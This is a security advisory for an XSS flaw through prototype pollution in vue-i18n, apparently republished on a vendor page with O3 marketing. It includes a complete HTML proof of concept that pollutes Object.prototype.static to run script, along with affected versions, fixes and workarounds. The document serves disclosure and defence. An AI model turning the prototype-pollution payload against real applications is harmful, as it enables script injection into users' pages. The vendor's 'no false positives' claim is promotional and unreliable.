GHSA-9r9m-ffp6-9x4v
vue-i18n has cross-site scripting vulnerability with prototype pollution
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
@intlify/core-basenpmvue-i18nnpm@intlify/corenpmDescription
Vulnerability type
XSS
Description
vue-i18n can be passed locale messages to createI18n or useI18n.
we can then translate them using t and $t.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.
The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.
Reproduce (PoC)
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<title>vue-i18n XSS</title>
<script src="https://unpkg.com/vue@3"></script>
<script src="https://unpkg.com/vue-i18n@10"></script>
<!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. -->
<script>
/**
* Prototype pollution vulnerability with `Object.prototype`.
* The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
* About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
*
* In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
* so there is always a property that is attached during optimization like this time.
* But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
*/
Object.defineProperty(Object.prototype, 'static', {
configurable: true,
get() {
alert('prototype polluted!')
return 'prototype pollution'
}
})
</script>
</head>
<body>
<div id="app">
<p>{{ t('hello') }}</p>
</div>
<script>
const { createApp } = Vue
const { createI18n, useI18n } = VueI18n
// AST style locale message, which build by `@intlify/unplugin-vue-i18n`
const en = {
hello: {
type: 0,
body: {
items: [
{
type: 3,
value: 'hello world!'
}
]
}
}
}
const i18n = createI18n({
legacy: false,
locale: 'en',
messages: {
en
}
})
const app = createApp({
setup() {
const { t } = useI18n()
return { t }
}
})
app.use(i18n)
app.mount('#app')
</script>
</body>
</html>
Workarounds
Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.
- jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation
- bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation
References
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | @intlify/core-base | ≥ 9.3.0&&< 9.14.2 | 9.14.2 |
| 📦npm | vue-i18n | ≥ 9.3.0&&< 9.14.2 | 9.14.2 |
| 📦npm | @intlify/core | ≥ 9.3.0&&< 9.14.2 | 9.14.2 |
| 📦npm | @intlify/vue-i18n-core | ≥ 9.3.0&&< 9.14.2 | 9.14.2 |
| 📦npm | petite-vue-i18n | ≥ 10.0.0&&< 10.0.5 | 10.0.5 |
| 📦npm | @intlify/core-base | ≥ 10.0.0&&< 10.0.5 | 10.0.5 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @intlify/core-base. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @intlify/core-base to 9.14.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9r9m-ffp6-9x4v is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-9r9m-ffp6-9x4v is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-9r9m-ffp6-9x4v. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-9r9m-ffp6-9x4v in your dependencies?
O3 detects GHSA-9r9m-ffp6-9x4v across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.